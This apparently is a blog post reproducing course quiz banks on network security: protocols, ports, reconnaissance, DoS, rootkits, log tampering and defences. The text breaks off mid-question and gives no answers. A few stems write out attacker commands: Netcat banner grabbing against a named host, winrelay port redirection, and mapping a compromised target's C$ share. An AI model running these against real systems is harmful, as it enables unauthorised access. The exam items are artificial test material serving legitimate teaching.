Monday, December 12, 2011

NETWORK VULNERABILITY & SECURITY TOOLS (ET0521)

59-question quiz for MST, Chapter 1 to Chapter 6

1.Which of the following is the best method for preventing social engineering attacks? 
a) User Education
b) Security Tokens
c) Biometric devices
d) Encryption



2. When a browser tries to contact a web server, the client OS dynamically assigns a source port value of _____.
a) less than 1024
b) greater than 80
c) greater than 1023
d) greater than 1024


3.The following are commonly used techniques for reconnaissance except ______. 
a) low-technology reconnaissance
b) web searches
c) whois database analysis
d) High performance hardware


4. An attacker with a low skill level is called ______.
a) cracker
b) hacker
c) script kiddie
d) Phreaker

5._____ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet Sniffing
b) Packet Spoofing
c) Packet Stealing
d) Packet Engineering

6.Which of the following software is a good port scanning tool?
a) Telnet
b) Nmap
c) ipconfig
d) portscan

7. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

8. What does an attacker do in the Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
ii. The Core of Reconnaissance attack is intrusive information gathering techniques.
iii. System is breached or accessed in order to retrieve information.

a) i only;
b) i and ii;
c) i, ii and iii;
d) None of the above

9. In order to determine which class any IP address is in, one should examine the first ____ bits of the IP address.

a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

10. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

11. Which of the following statements is FALSE?
a) A TCP packet includes two port numbers: a source port and a destination port.
b) A TCP port with a listening service is known as a reserved port.
c) The TCP port number is a 16-bit number.
d) There are 65536 different TCP ports on each machine.

12. Which of the following SuperScan tools is used to uncover the user account list at the target machine?
a) User account Exploit
b) User Engineering
c) Windows Enumeration
d) Windows User Exploit

13. Which of the following are the basic types of hacker attacks?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

14. The Transmission Control Protocol/Internet Protocol (TCP/IP) protocol that handles outgoing mail using port 25 is _____.

a) Simple Mail Transfer Protocol (SMTP)
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multipurpose Internet Mail Extensions (S/MIME)

15. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?

a) Tracert
b) ipconfig
c) ping
d) nslookup

16. Ethereal is a software tool used to ____ between client and server machines.
a) test the physical connection
b) test the functionality of Ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

17. Sending an e-mail from one address but making it seem as if it is coming from another is called ______.
a) falsifying
b) telneting
c) exploiting
d) spoofing

18. Each of the following is an OSI Model protocol layer except ______.

a) Software
b) Transport
c) Network
d) Physical

19. The following are methods employed to uncover system vulnerabilities except ______.

a) IP Address Scanning
b) Manual Vulnerability probing
c) Traffic Monitoring
d) Vulnerability Scanning

20. Nmap is able to provide the following types of scanning except ______.

a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

21. The objectives of port scanning are to identify the following except ______.

a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

22. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.

a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

23. In the TCP header, there are ____ TCP control bits, also known as the TCP flags.
a) 6
b) 7
c) 8
d) 9

24. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?
a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer 
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

25. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is a connection-oriented protocol
b) Transmitted packets are not put in order
c) No retransmission of lost packets
d) No acknowledgement or session tear-down required

26. When a threat uses a vulnerability to attack a resource, severe consequences can result, including:

i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) None of the above.

27. Which of the following statements are TRUE about the Computer Misuse Act (Cap 50A)?

i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

28. Which of the following statements is FALSE about Risk Management?
a) Risk can be qualitatively defined in three levels: Low, Medium and High
b) Risk Management is about Security
c) Risk management determines the value of the resources and the level of security for it
d) Threat + Vulnerability = Risk

29. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

30. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) Little interaction with Data Link (Layer 2)

31. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

32. Which of the following are TRUE about a Script Kiddie?

i. With low-level hacking skills
ii. Use released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Use Social Engineering technique

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

33. Which of the following is the outcome of an Access Attack?

a) It is an attack against the confidentiality of the information
b) It is an attack against the integrity of information
c) It causes information to be unavailable
d) It is an attack against the accountability of information

34. A person who applies his hacking skills for offensive purposes is known as
a) Cracker
b) White Hat
c) Ethical Hacker
d) Phreaker

35. Which information directory protocol is the standard for file transfer over the Internet?
a) TCP
b) UDP
c) FTP
d) HTTP

36. What information can be gathered by an attacker by typing the following command using Netcat?
C:> nc www.sp.edu.sg 80 <press Enter>
HEAD / HTTP/1.0 <press Enter>
<press Enter>

a) Domain Name
b) Web Server version
c) Administrative Contact Number
d) Netblock Owner

37. Internet is “managed” by
a) APNIC
b) ICANN
c) AfriNIC
d) ARIN

38. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. General types of reconnaissance data that can be obtained from the Internet are:

i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

40. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through

i. Social Engineering;
ii. Physical Break-in;
iii. War Dialling;
iv. Dumpster Diving.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

41. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying messages that network mapping tools rely on by using firewalls and packet filtering routers;
ii. Block incoming ICMP messages;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. Close all unused ports to prevent an attacker from discovering open ports on your machine

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv

42. The objectives of port scanning are generally to identify one or more of the following:

i. Open ports
ii. Host operating system
iii. Software or service versions
iv. Vulnerable software versions

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

43. Which of the following is FALSE?
a) TCP Connect is also known as Full Open Scan;
b) TCP SYN is also known as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans

44. The exploitation of resources can be performed in many ways. Some of the more common ways are:

i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a) i and ii;
b) i, ii and iii;
c) ii, iii and iv;
d) i, ii, iii and iv;

45. What is the name of the unique physical address that is assigned to every network interface card?

a) IP address
b) Hostname
c) MAC address
d) NetBIOS name

46. Which of the following protocols transmit sensitive information in clear text?

a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

47. The TCP/IP family of protocols includes several components:

i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

48. For the Information Gathering Methodology under Publicly Available Information, what common information does an attacker look for?

i. Names
ii. Emails
iii. Technologies
iv. Current Events / Recent Happenings

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

49. Which of the following statements is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets (should be TraceRoute)
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

50. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

51. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

52. Which of the following is the correct sequence of phases of a hacker’s attack?
a) Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b) Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c) Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d) Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

53. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

54. The premise behind reconnaissance activities is to profile the following except _________.
a) size of organisation
b) administrative staff
c) network infrastructure
d) an organisation's operations

55. Which of the following statements is FALSE about the key terms used in the risk management process?
a) A Resource is anything in an environment that you are trying to protect
b) A Threat is a resource that can be accessed by making use of a vulnerability in your environment
c) A Vulnerability is a point where a resource is susceptible to attack
d) Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

56. Which of the following is not a well-known TCP port number?
a) 8888
b) 53
c) 80
d) 25

57. Which of the following Hacker Class is also known as “Cracker”?
a) Grey Hats
b) Red Hats
c) Black Hats
d) White Hats

58. Which of the following is NOT a common Scanning activity?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

59. Internet search engines are used by attackers because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks



*Overall there are 75 quiz questions (most of the questions not included here are from Chapters 5 & 6). Know all the port numbers as well:
PORT 21 FTP
PORT 23 Telnet
PORT 25 SMTP
PORT 53 DNS/Domain
PORT 80 HTTP/Web




255-question quiz for Final Exam, Topic 1 to Topic 11

1. Which of the following are TRUE about the Smurf Attack?
i. The Smurf attack is also known as a directed broadcast attack
ii. Smurf attacks rely on a directed broadcast to create a flood of traffic for a victim
iii. A perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having the spoofed source address of a victim

a) i and ii;
b) i and iii;
c) ii and iii;
d) i, ii and iii.

2. The purpose of port scanning is to systematically scan a range of ____.
a) opened ports at the target system.
b) closed ports at the target system.
c) protected ports at the target system.
d) active ports that are running application services at the target system.

3. What is hybrid password cracking?
a) crack password by guessing every possible combination of characters.
b) crack password based on dictionary form.
c) crack password by using a combination of limited dictionary cracks and brute force cracking.
d) crack password based on hybrid characters.

4. A type of software that repairs security flaws in an application is called a(n) ________.
a) hot fix
b) exploit
c) repair
d) patch

5. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?
a) tracert
b) ipconfig
c) ping
d) nslookup

6. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

7. The following are methods employed to uncover system vulnerabilities except ______.
a) IP Address scanning
b) Manual vulnerability probing
c) Traffic monitoring
d) Vulnerability scanning

8. Which of the following statements are TRUE about the Computer Misuse Act (Cap 50A)?
i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

9. Which of the following event files is used to store security-related events like failed logon attempts, policy changes, and attempts to access files without proper permission in a Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

10. Which of the following are the common techniques used by sophisticated hackers for covering tracks and hiding in a compromised system?
i. Hiding evidence by altering event logs;
ii. Creating difficult-to-find files and directories;
iii. Hiding evidence on the network: Covert Channels;
iv. Deleting log files.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

11. Which of the following is NOT a common Scanning activity?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

12. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

13. Which application analyses a surfer's shopping habits and interests and inserts pop-up advertisements?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

14. Which method is NOT used in maintaining-access attacks?
a) Trojan Horses
b) Big Worms
c) Backdoors
d) Rootkits

15. A situation in which a program or process attempts to store more data in a temporary data storage area than it was intended to hold is known as a what?
a) Buffer overflow
b) Denial of service
c) Distributed denial of service
d) Storage overrun

16. The following are payloads provided by Metasploit to foist on the target machine except _____.
a) Create new user accounts
b) Bind shell to current port
c) Windows VNC Server DLL Inject
d) Inject DLL into running application

17. Which information directory protocol is the standard for file transfer over the Internet?
a) TCP
b) UDP
c) FTP
d) HTTP

18. Which of the following is NOT a correct defense method against User-Mode Rootkits?

a) Never let attackers get Administrator rights to the system.
b) Install MD5 & SHA-1.
c) Install Tripwire.
d) Install latest operating system patches.

19. If the attack is a SYN flood, which of the following Denial-of-Service attack categories does it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

20. Identify the category of Denial-of-Service attack if the attack is Smurf.
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

21. Which of the following is the correct sequence of phases of a hacker’s attack?
a) Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b) Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c) Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d) Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

22. Ethereal is a software tool used to ______ between client and server machines.
a) test the physical connection
b) test the functionality of ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

23. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

24. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

25. Which of the following is not one of the IP address ranges reserved for private use by RFC 1918?
a) 10.0.0.0-10.255.255.255
b) 192.168.0.0-192.168.255.255
c) 169.254.0.0-169.254.255.255
d) 172.16.0.0-172.31.255.255

26. An attacker can gain access to very sensitive information about an organisation through the following except _________.
a) Social engineering
b) Physical break-in
c) Dumpster diving
d) software engineering

27. What information can be gathered by an attacker by typing the following command using Netcat?
C:> nc www.sp.edu.sg 80 <press Enter>
HEAD / HTTP/1.0 <press Enter>
<press Enter>

a) Domain Name
b) Web Server version
c) Administrative Contact Number
d) Netblock Owner

28. For a DoS (Denial-of-Service) Attack, Resource Exhaustion can be achieved by:
i. Spawning processes to fill the process table
ii. Filling up the whole file system
iii. Packet floods
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

29. What type of attack attempts to use every possible key until the correct key is found?
a) Brute-force attack
b) Denial-of-service attack
c) Passive attack
d) Private key cryptography

30. Which of the following protocols should be disabled on a critical network device such as a router?
a) TCP/IP
b) ICMP
c) IPX/SPX
d) RIP

31. Sending an e-mail from one address but making it seem as if it is coming from another is called ______________.
a) falsifying
b) telneting
c) exploiting
d) spoofing

32. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

33. Which of the following is a correct definition of a Trojan?
a) It needs no user intervention to replicate.
b) It sends messages to a computer with an IP address indicating that the message is coming from a trusted host.
c) It collects personal information or changes your computer configuration without appropriately obtaining prior consent.
d) It buries itself in the operating system software and infects other systems only after a user executes the application that it is buried in.

34. Password cracking involves _________________.
a) stealing the encrypted password representations and trying to recover the original clear text password using an automated tool.
b) mounting a keylogger software in a computer to capture typed password.
c) guessing password using an automated tool.
d) password decrypting using an automated tool.

35. Which of the following is NOT a Distributed Denial-of-Service defense?
a) Packet filtering Firewalls at DMZ
b) Limit Bandwidth
c) Use egress Anti-Spoofing filters
d) Traffic shaping

36. Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?
a) DoS
b) Ping of death
c) Teardrop
d) Social engineering

37. Which of the following event files is used to store events associated with applications, e.g. databases, Web servers or user applications, in a Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

38. Windows events information is constantly being written into:
i. SECURITY.LOG ;
ii. FILE.LOG;
iii. APPLICATION.LOG;
iv. SYSTEM.LOG.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. Most Application-layer protocols only use UDP or TCP at the Transport layer. Which of the following could use both?
a) TCP
b) Microsoft Word
c) Telnet
d) DNS

40. Which of the following is NOT a feature of Windows User-Mode Rootkits?

a) Hiding files, processes, system services, system drivers, Registry keys and TCP/UDP ports.
b) Creating a remotely accessible command-shell backdoor, made invisible on the local system.
c) Activate the hidden system processes.
d) Lying to users about how much free space is available on the hard drive.

41. Which one of the following is not true about a web server?
a) The default port for a web server is port 80.
b) A web server must always run on port 80.
c) A commonly used alternate port for web servers is 8080.
d) The browser client must specify the port if not using well-known port 80.

42. A(n) _______ is a manner of manipulating software to result in undesired behaviour.
a) exploit
b) heap overflow
c) external probing
d) buffer overflow

43. Which of the following are the basic types of hacker attacks?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv.

44. Which of the following event files is used to store events associated with the system's functioning, e.g. failure of a driver or inability of a service to start, in a Windows system?

a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

45. Which of the following protocols does Ethereal indicate when pinging a computer?
a) Internet Control Message Protocol (ICMP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Domain Name System (DNS)

46. The exploitation of resources can be performed in many ways. Some of the more common ways are:
i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a) i and ii;
b) i, ii and iii;
c) ii, iii and iv;
d) i, ii, iii and iv.

47. Which of the following is the type of algorithm used by MD5?
a) Block cipher algorithm
b) Hashing algorithm
c) Asymmetric encryption algorithm
d) Cryptographic algorithm

48. Which are the other three of the SIX common techniques that can be applied to mount an effective defence against attackers having the ability to alter logs? The first three are:
- Activate Logging
- Setting Proper Permissions
- Using a Separate Logging Server

i. Encrypting Log Files
ii. Making Log Files Append Only
iii. Protecting Log Files Using Write-once Media
iv. Renaming Log Files

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) ii, iii and iv.

49. What is the meaning of Anonymizing HTTP Proxy?
a) Allow the attacker to surf the web as an anonymous user.
b) Allow the attacker to surf the Web without revealing the attacker's location.
c) Allow the attacker to surf the web without revealing the attacker's user account.
d) Allow the attacker to surf the web without revealing the attacker's HTTP sequence number

50. Which of the following is FALSE?
a) TCP Connect is also known as Full Open Scan;
b) TCP SYN is also known as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans.

51. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

52. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

53. Consider the situation in which an intervening entity such as a firewall blocks direct access to a target system. Resourceful attackers can find their way around these obstacles using __________.
a) denial-of-Service
b) port redirection
c) telnet
d) ftp

54. Which of the following is NOT a correct method to defend against bots, backdoors & spyware?
a) Use Antivirus and Antispyware Tools
b) Looking for Unusual TCP and UDP ports
c) Knowing Your hardware
d) Knowing Your Software

55. Which of the following is a class C address?
a) 128.10.54.120
b) 92.200.138.24
c) 168.28.10.165
d) 193.10.160.45

56. The most popular techniques for launching packet floods are:
i. Bonk;
ii. SYN floods
iii. Smurf attacks
iv. Distributed DoS attacks

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

57. What does it mean when running the following command at PC 192.168.1.2?
winrelay -lip 192.168.1.2 -lp 4000 -dip 192.168.1.23 -dp 5000 -proto tcp
i. It is a Trojan horse;
ii. PC 192.168.1.2 has been set up to listen on port 4000;
iii. Traffic arriving at port 5000 will be redirected to port 4000;
iv. PC 192.168.1.23 is the destination where the traffic will go to.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

58. Which of the following SuperScan4 tools is used to uncover the user account list?
a) Host and Service Discovery
b) Users Discovery
c) Scan Options
d) Windows Enumeration

59. Starting with Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, Microsoft's OS provides a feature called _____________ to support non-executable stack or heap capabilities.
a) Stack Overflow Prevention
b) Data Execution Prevention
c) Buffer Overflow Prevention
d) Memory Execution Prevention

60. For the Information Gathering Methodology under Publicly Available Information, what common information does an attacker look for?
i. Names
ii. Emails
iii. Technologies
iv. Current events / Recent happenings

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

61. Which application-level Trojan backdoor is able to grab keystrokes from the user and send sensitive information back to the attacker?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

62. Which of the following is FALSE?
a) There are five Regional Internet Registries (RIR) under the Address Supporting Organization
b) Domain name registrations are handled by the Internet Corporation for Assigned Names and Numbers (ICANN)
c) Each RIR maintains a whois database holding details of IP address registrations in its region
d) ICANN is responsible for coordinating the management of the technical elements of the DNS to ensure universal resolvability so that all users of the Internet can find all valid addresses

63. Which of the following is a known Kernel-Mode Rootkits software tool?
a) FU Rootkit for Windows.
b) KM Rootkit for Windows.
c) SU Rootkit for Windows.
d) KU Rootkit for Windows.

64. Which of the following statements is FALSE about Covert_TCP?
a) Covert_TCP’s covert channels are constructed by inserting data into unused or misused fields of TCP/IP headers
b) Covert_TCP’s covert channels are constructed by embedding one protocol entirely in a different protocol
c) Covert_TCP allows for transmitting information by entering ASCII data in TCP/IP header fields
d) The TCP/IP header fields used are: IP Identification, TCP sequence number and TCP acknowledgement number

65. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

66. Which of the following is commonly found to be a nonessential service on a web server?
a) Server service
b) DNS service
c) FTP service
d) Print spooler service

67. A _____ is an error condition in a software program that allows malicious code to be injected and put into operation without user intervention.
a) syntax overflow
b) semantic overflow
c) buffer overflow
d) software overflow

68. An attacker gathers the following types of reconnaissance data from company's own web site except _________.
a) hardware models
b) business partner
c) existing technologies
d) recent mergers and acquisitions

69. Which of the following is the best way to protect against security vulnerabilities within OS software?
a) Install the latest service pack.
b) Reinstall the OS on a regular basis.
c) Back up the system regularly.
d) Shut down the system when it is not in use.

70. Which of the following is the best method for preventing social engineering attacks?
a) User education
b) Security tokens
c) Biometric devices
d) Encryption

71. Which of the following protocols transmit sensitive information in clear text?
a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

72. Which of the following statements is FALSE?
a) TCP Packet includes two port numbers: a source port and a destination port
b) A TCP port with a listening service is known as a reserved port
c) The TCP port number is a 16-bit number
d) There are 65,536 different TCP ports on each machine

73. Which of the following statements is FALSE?
a) The .EVT files are “locked” on a running Windows machine, and cannot be opened or edited with a standard file-editing tool
b) On Linux and Unix systems, the vast majority of log files are written in plain ASCII text
c) The main accounting files in Linux and Unix are utmp, wtmp and lastlog files
d) The .EVT files on Windows machine can be opened or edited with a standard file-editing tool

74. Each of the following is an OSI model protocol layer except ______________.
a) Software
b) Transport
c) Network
d) Physical

75. When a browser is trying to contact a Web server, the client OS dynamically assigns a source port value of ______.
a) less than 1024.
b) greater than 80.
c) greater than 1023.
d) greater than 1024.

76. The primary goal of information security is to protect ______________.
a) procedures
b) people
c) information
d) products

77. Which of the following event files is most often targeted because it contains the majority of the events that attackers want to remove?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

78. For DoS (Denial-of-Service) Attack, Stopping service means:
a) crashing or shutting off a specific program or machine that users want to access;
b) stopping the computer from booting up;
c) shutting down the computer remotely;
d) stopping the network resource from being accessed.

79. Which is NOT a countermeasure of Buffer Overflow Attacks?
a) avoid sloppy programming
b) configure system with executable stack
c) implement strict control on unnecessary outgoing traffic from the network
d) apply patches to system

80. To protect the privacy of web surfing habits, which of the following should be deleted on a regular basis?
a) Download history
b) SSL certificates
c) Cookies
d) Plug-ins

81. In order to exploit the RPC vulnerability, the attacker would require the ability to send a specially crafted request to which three ports of the remote machine?
a) 135, 139 or 145
b) 21, 23 or 80
c) 21, 135 or 139
d) 135, 139 or 445

82. When a browser surfs the Internet, which of the following is the correct order of data flow through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

83. Which of the following statements is FALSE?
a) Covert channels often rely on a technique called tunnelling, which allows one protocol to be carried over another protocol
b) Techniques for establishing covert channels across the network require both a client (attacker system) and a server (victim system)
c) Loki and Reverse WWW Shell are widely exchanged within the computer underground based on tunnelling covert information techniques
d) Reverse WWW Shell utilises ICMP as a tunnel to carry on interactive communications with the backdoor listener

84. Which of the following is the correct sequence of phases of a hacker's attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

85. You need to allow only secure Internet traffic in and out of your company network. Which of the following ports would you open on the firewall?
a) 22
b) 53
c) 80
d) 443

86. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through i. Social Engineering; ii. Physical Break-in; iii. War Dialling; iv. Dumpster Diving.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

87. The attacker has managed to access the target system. Identify what the following command execution statement does:
>net use z: \\192.168.1.2\c$ */u:student
a) check which network is connected to the Z drive of the target system.
b) check whether there is a network "student" which is connected to the z drive of the target system.
c) map the c drive of the target system to the z drive of the attacker.
d) map the attacker system's c drive to the z drive of the target system.

88. The objectives of port scanning are generally to identify one or more of the following: i. Open ports ii. Host operating system iii. Software or service versions iv. Vulnerable software versions
a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

89. Which of the following is the outcome of an Access Attack?
a. It is an attack against the confidentiality of the information
b. It is an attack against the integrity of information
c. It causes information to be unavailable
d. It is an attack against the accountability of information

90. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

91. When a threat uses a vulnerability to attack a resource, the severe consequences can include
i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a. i and ii;
b. ii and iii;
c. i, ii and iii;
d. None of the above.

92. Which layer of the OSI model is responsible for code and character-set conversion as well as recognizing data formats?
a) Application
b) Presentation
c) Session
d) Network

93. Nmap is able to provide the following types of scanning except ______.
a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

94. Which of the following Hacker Class is also known as “Cracker”?
a. Grey Hats
b. Red Hats
